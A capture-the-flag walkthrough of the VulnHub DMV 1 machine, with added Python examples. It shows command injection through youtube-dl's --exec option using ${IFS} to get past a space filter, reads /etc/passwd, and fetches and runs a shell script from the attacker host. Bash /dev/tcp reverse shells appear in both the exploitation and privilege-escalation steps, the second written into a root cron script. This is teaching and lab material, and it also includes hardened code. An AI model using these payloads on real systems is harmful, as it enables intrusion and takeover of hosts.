VulnHub: DMV 1
Reconnaissance
1. Scan the network for live hosts
nmap -sn <ip range>
2. Scan for open ports
nmap -Pn <ip>
3. Scan all 65535 ports (the default scan only covers the top 1000)
nmap -Pn -p- <ip>
4. Service and version detection
nmap -sV <ip>
5. Scan for known vulnerabilities with the nmap NSE scripts
nmap --script vuln <ip>
6. Directory brute-forcing
dirb http://<ip>
7. Try logging in over SSH
ssh <ip>
8. Browse the site
http://<ip>
http://<ip>/admin
http://<ip>/tmp/
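Added example (not part of the original walkthrough): `nmap -sV <ip>` on its own only probes the default top-1000 ports, so a service found by `-p-` on a high port is missed unless those ports are fed back in. This Python script parses the grepable output of the full sweep (saved with `nmap -Pn -p- -oG full.gnmap <ip>`) and builds the follow-up `-sV` command restricted to exactly the open ports. The gnmap text and the host address are constructed for the example.

```python
"""Turn the full port sweep into a targeted service scan (added example)."""
import re
from typing import Dict, List

# Constructed sample of `nmap -oG` output: three open ports, one closed, one filtered.
SAMPLE_GNMAP = """\
# Nmap 7.80 scan initiated Mon Jan  1 00:00:00 2024 as: nmap -Pn -p- -oG full.gnmap 192.0.2.10
Host: 192.0.2.10 ()\tStatus: Up
Host: 192.0.2.10 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///, 443/closed/tcp//https///, 8080/filtered/tcp//http-proxy///, 65000/open/tcp//unknown///\tIgnored State: closed (65530)
# Nmap done at Mon Jan  1 00:00:00 2024 -- 1 IP address (1 host up) scanned in 10.00 seconds
"""

# Each port entry looks like "22/open/tcp//ssh///": number/state/protocol//service///
PORT_RE = re.compile(r"(\d+)/(\w+)/(\w+)//")


def open_ports(gnmap: str) -> Dict[str, List[int]]:
    """Map each host to its sorted list of open TCP ports from grepable output."""
    result: Dict[str, List[int]] = {}
    for line in gnmap.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue  # comment lines and the "Status: Up" line carry no ports
        host = line.split()[1]
        _, ports_field = line.split("Ports:", 1)
        ports_field = ports_field.split("\t", 1)[0]  # drop the "Ignored State: ..." tail
        for port, state, proto in PORT_RE.findall(ports_field):
            if state == "open" and proto == "tcp":
                result.setdefault(host, []).append(int(port))
    for host in result:
        result[host].sort()
    return result


def service_scan_command(host: str, ports: List[int]) -> str:
    """Build the follow-up -sV command limited to the ports that are actually open."""
    if not ports:
        raise ValueError(f"no open ports recorded for {host}")
    return f"nmap -Pn -sV -p {','.join(map(str, ports))} {host}"


if __name__ == "__main__":
    for host, ports in open_ports(SAMPLE_GNMAP).items():
        print(service_scan_command(host, ports))
```

Run it against your own `full.gnmap` by reading the file into `open_ports`; port 65000 in the sample is the case the plain `-sV` run would have missed.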
Exploitation
1. The site appears to be a YouTube downloader front end
2. Let's try a video
Paste a video ID
Error!!!
3. Let's try again with another video
Still an error!!!
4. Intercept the request with Burp Suite
Send it to Repeater
Send the request; the response contains an error message
5. Let's google the error message
I came across this link: https://github.com/ytdl-org/youtube-dl/issues/21057
Open the youtube-dl project page and read the manual
6. Back in Repeater, try a command through the --exec option (the backticks are shell command substitution, so the command runs in the shell that launches youtube-dl)
--exec`pwd`
Read the passwd file
--exec`cat /etc/passwd`
Error!!! The application refuses the literal space.
Replace each space with "${IFS}" (the shell's internal field separator, which expands to whitespace)
--exec`cat${IFS}/etc/passwd`
7. Reverse shell
Start a listener on the attacker machine
nc -lvp 1234
Try a reverse shell command
Reference: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
--exec`bash${IFS}-i${IFS}>&${IFS}/dev/tcp/10.0.2.8/1234${IFS}0>&1`
Failed!!!
Let's try another way: I will upload a reverse shell script to the victim's machine instead
Take the Python reverse shell from the cheat sheet and save it as "shell.sh"
Start an HTTP server in the directory holding shell.sh
python -m SimpleHTTPServer <port no.>
Back in Repeater, download shell.sh into the writable images directory under the web root, then run it
--exec`cd${IFS}/var/www/html/images/;wget${IFS}http://<attacker ip>:<attacker port>/shell.sh`
--exec`cd${IFS}/var/www/html/images/;bash${IFS}shell.sh`
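Added example, not code from the DMV box or from youtube-dl: it models the two things the exploitation steps above rely on. First, the server glues the submitted video ID onto a youtube-dl shell command, so the backticks are evaluated by the shell before youtube-dl ever parses its arguments. Second, a filter that only rejects literal spaces is bypassed by ${IFS}, which the shell expands back to whitespace. Beside the vulnerable pattern is the hardened form: an allow-list regex for the ID and an argv list without a shell. The form field name `yt_url` is an assumption; only the payload shape comes from the walkthrough.

```python
"""Command injection through the video-ID field, and the fix (added example)."""
import re
import shlex
import urllib.parse
from typing import List

# YouTube video IDs are 11 characters from this alphabet; anything else is rejected.
VIDEO_ID_RE = re.compile(r"^[A-Za-z0-9_-]{11}$")


def build_exec_payload(command: str) -> str:
    """Turn a shell command into the --exec`...` payload the box accepted.

    Spaces become ${IFS} because the application refuses literal spaces;
    inside the backticks the shell expands ${IFS} back into a separator.
    """
    return "--exec`" + command.replace(" ", "${IFS}") + "`"


def form_body(command: str, field: str = "yt_url") -> str:
    """URL-encode the payload as a form body for Repeater (field name is assumed)."""
    return urllib.parse.urlencode({field: build_exec_payload(command)})


def space_blocklist_allows(value: str) -> bool:
    """The kind of filter the box appears to use: reject only a literal space."""
    return " " not in value


# --- vulnerable: user input concatenated into a string handed to a shell ------
def vulnerable_command(user_input: str) -> str:
    """What subprocess.run(..., shell=True) would receive; backticks run first."""
    if not space_blocklist_allows(user_input):
        raise ValueError("spaces are not allowed")
    return "youtube-dl " + user_input


# --- hardened: strict allow-list, argv list, no shell -------------------------
def hardened_argv(user_input: str) -> List[str]:
    """Validate the ID against the allow-list and build an argv list.

    No shell is involved, so backticks and ${IFS} are inert bytes, and the
    "--" terminator stops an ID that starts with "-" being read as an option.
    """
    if not VIDEO_ID_RE.match(user_input):
        raise ValueError("not a valid video id")
    return ["youtube-dl", "--", user_input]


if __name__ == "__main__":
    payload = build_exec_payload("cat /etc/passwd")
    print(payload)                      # passes the space blocklist
    print(form_body("cat /etc/passwd"))
    print(vulnerable_command(payload))  # reaches the shell intact
    try:
        hardened_argv(payload)
    except ValueError as e:
        print("hardened handler:", e)
    print(shlex.join(hardened_argv("abcDEF123_-")))  # constructed valid ID
```

The hardened handler never sees a shell, so even a payload that defeats the blocklist is just an invalid ID; the allow-list is what makes the check robust, not a longer list of banned characters.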
Privilege Escalation
1. First flag
cd admin
cat flag.txt
2. Get root access
/tmp contains clean.sh, which is writable by the current user and is run as root on a schedule, so overwrite it with a reverse shell:
cd /tmp
ls
cat clean.sh
echo 'bash -i >& /dev/tcp/10.0.2.8/1234 0>&1' > clean.sh
Back on the attacker's machine, we already have a listener on port 1234.
Wait a moment for the scheduled job to run
Now I have a root shell
cd /root
ls
cat root.txt
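Added example, not from the original walkthrough, generalising the privilege escalation above: the root shell comes from a script in /tmp that a privileged scheduled job executes and that the low-privileged user can overwrite. The check below parses system-crontab lines (the /etc/crontab format with a user field), picks out the script each privileged entry executes, and reports it when the current user can write to it, or can create it because its directory is writable. The crontab text is constructed for the example; run the check as the unprivileged user you are escalating from, since os.access reports everything as writable for root.

```python
"""Find scheduled scripts the current user can overwrite (added example)."""
import os
import re
import shlex
import tempfile
from typing import List, Optional, Tuple

# Constructed /etc/crontab content: five time fields, a user field, then the command.
SAMPLE_CRONTAB = """\
SHELL=/bin/bash
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
*/1 *   * * *   root    /bin/bash /tmp/clean.sh
0 3     * * *   backup  /usr/local/bin/backup.sh --quiet
"""

# Interpreter binaries are skipped so the script they run is what gets reported.
INTERPRETERS = {"bash", "sh", "dash", "python", "python3", "perl"}


def parse_system_crontab(text: str) -> List[Tuple[str, str]]:
    """Return (user, command) pairs, skipping comments and VAR=value lines."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        fields = line.split(None, 6)  # 5 time fields, user, rest is the command
        if len(fields) < 7:
            continue
        entries.append((fields[5], fields[6]))
    return entries


def script_path(command: str) -> Optional[str]:
    """Pick the first absolute path in the command that is not an interpreter."""
    try:
        argv = shlex.split(command)
    except ValueError:
        return None
    for token in argv:
        base = os.path.basename(token)
        if token.startswith("/") and base and base not in INTERPRETERS:
            return token
    return None


def writable_cron_scripts(crontab_text: str,
                          privileged_users: Tuple[str, ...] = ("root",)) -> List[Tuple[str, str]]:
    """(user, path) for privileged entries whose script the current user can modify.

    A script is reported if it is writable, or if it does not exist yet but its
    directory is writable (we could create it before the job next fires).
    Note: as root, os.access() says everything is writable; run this unprivileged.
    """
    findings = []
    for user, command in parse_system_crontab(crontab_text):
        if user not in privileged_users:
            continue
        path = script_path(command)
        if path is None:
            continue
        if os.path.exists(path):
            exposed = os.access(path, os.W_OK)
        else:
            exposed = os.access(os.path.dirname(path) or "/", os.W_OK)
        if exposed:
            findings.append((user, path))
    return findings


def demo_in_tempdir() -> Tuple[str, List[Tuple[str, str]]]:
    """Self-contained demonstration: a root job pointing at a script we own."""
    directory = tempfile.mkdtemp()
    path = os.path.join(directory, "clean.sh")
    with open(path, "w") as f:
        f.write("#!/bin/bash\nrm -rf /tmp/*.tmp\n")  # stand-in for the box's clean.sh
    crontab = (
        "*/1 * * * * root /bin/bash " + path + "\n"
        "0 4 * * * www-data /bin/bash " + path + "\n"  # unprivileged entry: ignored
    )
    return path, writable_cron_scripts(crontab)


if __name__ == "__main__":
    for user, command in parse_system_crontab(SAMPLE_CRONTAB):
        print(f"{user:8} runs {script_path(command)}")
    print("writable by us:", demo_in_tempdir()[1])
```

On the box itself, feed the contents of /etc/crontab (and the files under /etc/cron.d) to `writable_cron_scripts`; the /tmp/clean.sh entry in the constructed sample is the pattern that gives root here.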